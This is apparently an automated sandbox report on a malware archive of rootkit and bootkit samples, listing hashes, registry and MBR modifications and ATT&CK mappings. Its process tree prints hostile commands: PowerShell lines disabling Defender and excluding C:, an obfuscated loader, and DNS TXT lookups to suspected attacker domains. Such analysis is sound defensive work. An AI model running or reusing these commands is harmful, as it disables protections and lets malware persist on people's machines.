Analysis
max time kernel: 288s
max time network: 317s
platform: windows10-2004_x64
resource: win10v2004-20231020-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-11-2023 21:09
Behavioral task: behavioral1
Sample: Rootkits & Bootkits.zip
Resource: win10v2004-20231020-en
General
Target: Rootkits & Bootkits.zip
Size: 99.1MB
MD5: daa4a303815b2f4b3383ae4e9cb9d70b
SHA1: 71ad3c455f33dff881e05816d87f43e48b6a5084
SHA256: 94e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24
SHA512: 7c2fd76a9fc12382df8abb3ad459dc962ffe07ff03fd4801eb6a68e0802df9b5a1136fec3d421ffcfb387033ea9de3d302a878f1a901257be03f6271574557fa
SSDEEP: 1572864:Hz9VYu6kNhSQlSkdCUZdoinM59VVzg4dPC7v9A17V3nBDlxn3hqzLpPr:TQk/HHnMHkHBA17lnTqpPr
Malware Config
Signatures
-
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PTWRHNDALZ.lnk | MsiExec.exe
Loads dropped DLL 2 IoCs
pid | Process
948 | MsiExec.exe
948 | MsiExec.exe
Unexpected DNS network traffic destination 9 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description | ioc
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
Destination IP | 114.114.114.114
-
resource | yara_rule
behavioral1/memory/540-251-0x0000000000400000-0x000000000151E000-memory.dmp | vmprotect
behavioral1/memory/1928-255-0x0000000000400000-0x000000000157F000-memory.dmp | vmprotect
behavioral1/memory/540-323-0x0000000000400000-0x000000000151E000-memory.dmp | vmprotect
behavioral1/memory/1928-324-0x0000000000400000-0x000000000157F000-memory.dmp | vmprotect
behavioral1/memory/1928-326-0x0000000000400000-0x000000000157F000-memory.dmp | vmprotect
behavioral1/memory/1928-383-0x0000000000400000-0x000000000157F000-memory.dmp | vmprotect
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PTWRHNDALZ = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\PTWRHNDALZ.lnk" | MsiExec.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
155 | 948 | MsiExec.exe
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PHYSICALDRIVE0 | 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
File opened for modification | \??\PHYSICALDRIVE0 | 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
File opened for modification | \??\PHYSICALDRIVE0 | 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
File opened for modification | \??\PHYSICALDRIVE0 | 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
File opened for modification | \??\PHYSICALDRIVE0 | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Drops file in Windows directory 11 IoCs
description | ioc | Process
File created | C:\Windows\Installer\e597d06.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI7D83.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\SourceHash{817E4709-EB1A-4B7F-B602-C06BD1A2FEB4} | msiexec.exe
File created | C:\Windows\Tasks\dialersvc32.job | 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
File opened for modification | C:\Windows\Installer\e597d06.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI813D.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8351.tmp | msiexec.exe
File created | C:\Windows\addins\modulConfing.config | 03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Modifies registry class 3 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify\State = "0" | taskmgr.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\SpotifyAB.SpotifyMusic_zpdnekdrzrea0\Spotify\UserEnabledStartupOnce = "0" | taskmgr.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2448 | taskmgr.exe
Suspicious use of AdjustPrivilegeToken 48 IoCs
description | pid | Process
Token: SeManageVolumePrivilege | 2100 | svchost.exe
Token: SeShutdownPrivilege | 4628 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4628 | msiexec.exe
Token: SeSecurityPrivilege | 3996 | msiexec.exe
Token: SeCreateTokenPrivilege | 4628 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 4628 | msiexec.exe
Token: SeLockMemoryPrivilege | 4628 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4628 | msiexec.exe
Token: SeMachineAccountPrivilege | 4628 | msiexec.exe
Token: SeTcbPrivilege | 4628 | msiexec.exe
Token: SeSecurityPrivilege | 4628 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 4628 | msiexec.exe
Token: SeLoadDriverPrivilege | 4628 | msiexec.exe
Token: SeSystemProfilePrivilege | 4628 | msiexec.exe
Token: SeSystemtimePrivilege | 4628 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 4628 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 4628 | msiexec.exe
Token: SeCreatePagefilePrivilege | 4628 | msiexec.exe
Token: SeCreatePermanentPrivilege | 4628 | msiexec.exe
Token: SeBackupPrivilege | 4628 | msiexec.exe
Token: SeRestorePrivilege | 4628 | msiexec.exe
Token: SeShutdownPrivilege | 4628 | msiexec.exe
Token: SeDebugPrivilege | 4628 | msiexec.exe
Token: SeAuditPrivilege | 4628 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 4628 | msiexec.exe
Token: SeChangeNotifyPrivilege | 4628 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 4628 | msiexec.exe
Token: SeUndockPrivilege | 4628 | msiexec.exe
Token: SeSyncAgentPrivilege | 4628 | msiexec.exe
Token: SeEnableDelegationPrivilege | 4628 | msiexec.exe
Token: SeManageVolumePrivilege | 4628 | msiexec.exe
Token: SeImpersonatePrivilege | 4628 | msiexec.exe
Token: SeCreateGlobalPrivilege | 4628 | msiexec.exe
Token: SeRestorePrivilege | 3996 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3996 | msiexec.exe
Token: SeRestorePrivilege | 3996 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3996 | msiexec.exe
Token: SeRestorePrivilege | 3996 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3996 | msiexec.exe
Token: SeRestorePrivilege | 3996 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3996 | msiexec.exe
Token: SeDebugPrivilege | 2448 | taskmgr.exe
Token: SeSystemProfilePrivilege | 2448 | taskmgr.exe
Token: SeCreateGlobalPrivilege | 2448 | taskmgr.exe
Token: SeRestorePrivilege | 3996 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3996 | msiexec.exe
Token: SeRestorePrivilege | 3996 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3996 | msiexec.exe
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 64 IoCs
Suspicious use of SetWindowsHookEx 7 IoCs
pid | Process
1592 | 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
1992 | 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
2068 | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
3644 | 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
4416 | 5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
2032 | 22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
1436 | 03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
Suspicious use of WriteProcessMemory 8 IoCs
description | pid | Process | procid_target
PID 3996 wrote to memory of 948 | 3996 | msiexec.exe | 127
PID 3996 wrote to memory of 948 | 3996 | msiexec.exe | 127
PID 3996 wrote to memory of 948 | 3996 | msiexec.exe | 127
PID 1592 wrote to memory of 4632 | 1592 | 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe | 133
PID 1592 wrote to memory of 4632 | 1592 | 6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe | 133
PID 2068 wrote to memory of 4104 | 2068 | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe | 135
PID 2068 wrote to memory of 4104 | 2068 | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe | 135
PID 2068 wrote to memory of 4104 | 2068 | f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe | 135
Views/modifies file attributes 1 TTPs 1 IoCs
pid | Process
808 | attrib.exe
Processes
-
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Rootkits & Bootkits.zip"
1⤵ PID:4136
-
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵ PID:4152
-
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵ PID:3128
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\8dcc573293ae9a545655a47e23f106738a190f5318c31124bd3a73b12f128df6.msi"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4628
-
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E04E82D44FFE3E025B0AF46B1777CC7B
2⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Blocklisted process makes network request
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:948
-
-
C:\Users\Admin\Desktop\6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
"C:\Users\Admin\Desktop\6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe"
1⤵
- Maps connected drives based on registry
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\6B0CD0~1.EXE
2⤵ PID:4632
-
-
C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
"C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:1992
-
C:\Users\Admin\Desktop\f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
"C:\Users\Admin\Desktop\f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe"
1⤵
- Maps connected drives based on registry
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\Desktop\F428B4~1.EXE >> NUL
2⤵ PID:4104
-
-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2448
-
C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
"C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:3644
-
C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
"C:\Users\Admin\Desktop\5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:4416
-
C:\Users\Admin\Desktop\4e6b9a6d0870e85cbb957fc5e33503841f79f48e9f701f6e3d62a00dd8c82388.exe
"C:\Users\Admin\Desktop\4e6b9a6d0870e85cbb957fc5e33503841f79f48e9f701f6e3d62a00dd8c82388.exe"
1⤵ PID:2436
-
C:\Users\Admin\Desktop\03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
"C:\Users\Admin\Desktop\03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1436
-
C:\Users\Admin\Desktop\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
"C:\Users\Admin\Desktop\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2032
-
C:\Users\Admin\Desktop\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
"C:\Users\Admin\Desktop\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"
1⤵ PID:540
-
C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵ PID:2640
-
-
C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe
"C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe"
1⤵ PID:2120
-
C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe
"C:\Users\Admin\Desktop\096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe"
2⤵ PID:1948
-
C:\Windows\SYSTEM32\attrib.exe
attrib +h +s c:\windows\system32\drivers\svihost.exe
3⤵
- Views/modifies file attributes
PID:808
-
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -c Set-MpPreference -PUAProtection 0"
3⤵ PID:4020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Set-MpPreference -PUAProtection 0
4⤵ PID:3584
-
-
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -c Add-MpPreference -ExclusionPath "C:""
3⤵ PID:5012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Add-MpPreference -ExclusionPath "C:"
4⤵ PID:3748
-
-
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -c Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableIOAVProtection 1 -DisableScriptScanning 1"
3⤵ PID:3168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableIOAVProtection 1 -DisableScriptScanning 1
4⤵ PID:4684
-
-
-
-
C:\Users\Admin\Desktop\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
"C:\Users\Admin\Desktop\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe"
1⤵ PID:1928
-
C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 4795aefc17.bbyyjy.com 114.114.114.114
2⤵ PID:1060
-
-
C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.114
2⤵ PID:3296
-
-
C:\Windows\SysWOW64\nslookup.exe
nslookup -qt=TXT 9c15224a8228b9a9.huodu.xyz 114.114.114.114
2⤵ PID:2572
-
-
C:\Users\Admin\Desktop\cce24ebdd344c8184dbaa0a0c4a65c7d952a11f6608fe23d562a4d1178915eac.exe
"C:\Users\Admin\Desktop\cce24ebdd344c8184dbaa0a0c4a65c7d952a11f6608fe23d562a4d1178915eac.exe"
1⤵ PID:1376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵ PID:4216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵ PID:4440
-
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4596103d-7d7c-4aa0-b4e2-b990abc45620}
1⤵ PID:4100
-
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{290046e6-c08c-4636-a7bb-71496fa2abc7}
1⤵ PID:4372
-
C:\Windows\system32\sihost.exe
sihost.exe
1⤵ PID:3832
-
C:\Windows\system32\sihost.exe
sihost.exe
1⤵ PID:4416
-
C:\Windows\system32\sihost.exe
sihost.exe
1⤵ PID:1076
Network
MITRE ATT&CK Enterprise v15
Persistence
  Boot or Logon Autostart Execution: 1
    Registry Run Keys / Startup Folder: 1
  Pre-OS Boot: 1
    Bootkit: 1
Privilege Escalation
  Boot or Logon Autostart Execution: 1
    Registry Run Keys / Startup Folder: 1
Defense Evasion
  Hide Artifacts: 1
    Hidden Files and Directories: 1
  Modify Registry: 1
  Pre-OS Boot: 1
    Bootkit: 1
Downloads
SHA14f269090b85f32a930323479a2f16c2f3813c760
SHA256d3993b44be58b751b7431a523ce7bbab54034b0f8bead986cb791959f57093cf
SHA512f1daa01f17f99cbd827e60cdbc76a54fa03ee6ef9ba46812b68c1ba5cafdd56db6598f7b9ad95a904946869f0b3b95cd91591624289be5131c25f478abdb5a22
-
Filesize
691KB
MD5799dea7122cc380ea4884bc1ccd876bb
SHA18adfe2adafff040f808ebc2f62f36cd668e405a4
SHA256779ad7e8d0cce1d4e701fb06e98166a06c7f513b670a145c7f6f023aa88cc10b
SHA512af01d4b87d60d26d669f77e704ca4077aae838fd393d96cdaea3fa6d0e5a99a3f7341e457b434f3a8551cbc6e193399eec3a571bb78fdc7b729db5e1cc122eae
-
Filesize
769KB
MD51ea491a24c44e13228b7bf61fd3d0067
SHA1a684ba2c5b28792afa87f90290461be4c60be194
SHA25690fbe5548ecda4eece9510802a60ee7c19207e128d0d0fd20cf1accf8930f7ed
SHA512af98b580cea6254e658d277175bcb0bb7b38800658be7f898d2c450c3631bf786f06d02a97cc53466b2616851fb40d11c1a2182c91aa67082e64aac8806062e7
-
Filesize
477KB
MD530155838c404c08676ab1739c6039848
SHA189d3cf100621a19d612e460c385823724729adf4
SHA256ca78882f754114c2f49bc04ae4b4ab0f17398dd13688477ed816a1e9d41e806c
SHA512b625884a988cc3582f77e4f7f0d70f4b696c62cd226e2929f2e6d28d613ce9930ed142889e9d921fab0e7ad93e8f1aa2470ef19b58617118e9bf83416c865463
-
Filesize
321KB
MD5b22f87814fd0ed041af6a9235bf9bb87
SHA19adabb620348a1ef09b7eff50fc341de283640bb
SHA2562ecb51beff116d2585cb52e087507d13541b211971d0cbafa2159477b454024f
SHA5122d6cda2cf36f9e7b017ecea5a7c31a96e20e6e561a8414daf77db790ab61d6472b92f56791b9dc8a0a4f85089908cd5ca1ccb21d702a6b958403749cf6c1857c
-
Filesize
2KB
MD5b428b99559dcf4466797ebbf639f940c
SHA1eaeeacfceb4f503aaf2dcee22c9b20fab2be3de0
SHA256ff3b5a077a575d2f910f5d59ae85d25672425f5a98c955aa784ee494493309ed
SHA512063e37793f5b88bae5d38088e2b3172fbd63182a39c743229de4896aebd1cdf45460f5ec99906440c223d28dafe4246f85c3037c2f901c404d72f247801b4f73
-
Filesize
282KB
MD5a99c0227ed5dd7cf6a7826e2bd663292
SHA16a2a1a47716aed97947e10fc77feba4f10431f68
SHA256e721b907e5d7a1cc9d1e36dfa492aa4997da6668542e5d9cbdfbd6b1ae1bd0f7
SHA51281e19d272ed161258fcc0e4ebc3b78bf7d5ee4804cab60a37e82f574ab82e2b7ec2f686a88d96c86988124a54dd03247d3e5d7a7acadc40bbe1db257e457be12
-
Filesize
750KB
MD5f6a8eab63e297e0f9a137de7bb3862b8
SHA10021975d9e859e1a2f92c7be45137596992e907d
SHA25675a5f9fc9d962bab1e3644409e1fa5176c317f2025ffb3c3052f56da33ee3cb9
SHA512f4bda5e27db5584fd23b1401bf71d7f1be600eddd275f2bcdec604e9f89c45ce409985985d4feeca34859deaab3fe3fab5682083ef394aaafd5ada493c2cd05f
-
Filesize
574KB
MD56bdde6fd511514cfb2b8d2a407a39d0b
SHA17b7163fca0bf330d627f975beef03a6680ca5f71
SHA2569f659aec2585fbd8bde0c2bc1fdc516d59a1aeb2d5b7342bfd7dad8dc80bbc7a
SHA5128ebcdee374032b686ed5994bf2e649be182038bb41c0a2dad49e3342cf44b1eb39b013b3121c4ddf2764330ff1fc039f62d8870b672a2ef1f2406f0238b3611d
-
Filesize
652KB
MD5fb77d298851e0edce21b6450093ec85e
SHA1fc526ade16f0fd8661f89a0e96d56a629a785700
SHA256d252a7b84c679c5af3a01d453b6e7a537d8cd02d77c4c15a65d858b718d41f1f
SHA512ae272133f51793012efd7088b1d10411d4bea379e300bfbd47c2b693ce710b4cd8376d9cea4804efceba66fa257eb66850163d3a0a7a3f6098321e01af9d3397
-
Filesize
301KB
MD541026f00a6358da78575a4e7564c7de8
SHA1652cd1938d360b4a9d0219899e7661054439cb22
SHA256ea9d07c3ed7d518ca938b8a1d9e1de133c5a297dde7b20797cd35d33e4284c4e
SHA512677de1abf02bd968b17cc269d8bcd3a361a933e61f0f89822a5ca51ff56198f1a97d534e5b2acb55e53134aba2093f06a4c97e8237c98c94c79bbe178e333db3
-
Filesize
555KB
MD5dafc0ac0c826c01ca6a813c165dfec2e
SHA1cb499bc59c1ca0d976487e3fab11078c2d8fc218
SHA2568a42ac34bf7b03484e051c4be59c5279d9fc89293be6d35900fa92ffd1476183
SHA5124b12b294ca981d6ff55d892d3120ec42e9deb6aaadfd6322360b8f0d02eb131809349d936bd366327db90478d95ba46ccad4c966ede8544cb2720c31c63090f7
-
Filesize
711KB
MD595b9d227166c44bacf88c6d3ba53393b
SHA1a8615a5f2131ec47a39745fb6c781d2a6ee0167c
SHA2565325e8f69c07a8f5f6e6d9a2b140e33efa83f6b9608d5f8d31c13293b2ba83ed
SHA512006176950531142dff8ee8dbe88ed45618d0249a383959dde699249c69aeb7f36e825da68e920116b9180689bf40197695d233a9e95a4dab1dff8758d0087425
-
Filesize
340KB
MD5a1f09d6896fc0cdf605d0dda5f29a6b5
SHA196f63237e6d21592283e02d2d23eb5266dbf98df
SHA2565e8b926e066220d716a9f23d41073ce5eb4ab4cf7fe49ad2a27c2bab59bc4f64
SHA5121a6f1ed0566988ba4bf16e50573476f401dbf190d515996658b60a0c35fd1767c0a6e4ed40c8ec17ecffdd5c38cfb4bc586bb296721537b78ceefc5999e7e15e
-
Filesize
99.1MB
MD5daa4a303815b2f4b3383ae4e9cb9d70b
SHA171ad3c455f33dff881e05816d87f43e48b6a5084
SHA25694e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24
SHA5127c2fd76a9fc12382df8abb3ad459dc962ffe07ff03fd4801eb6a68e0802df9b5a1136fec3d421ffcfb387033ea9de3d302a878f1a901257be03f6271574557fa
-
Filesize
788KB
MD509b03b8002d407e0214f9d2ef49d2bcd
SHA1c826ec8baa56995613aa681e5ace7250a1b6d791
SHA256d24863b68ca0a080c3f9aeeb28fa246fcdb9e9d9394530b6e06f265621195644
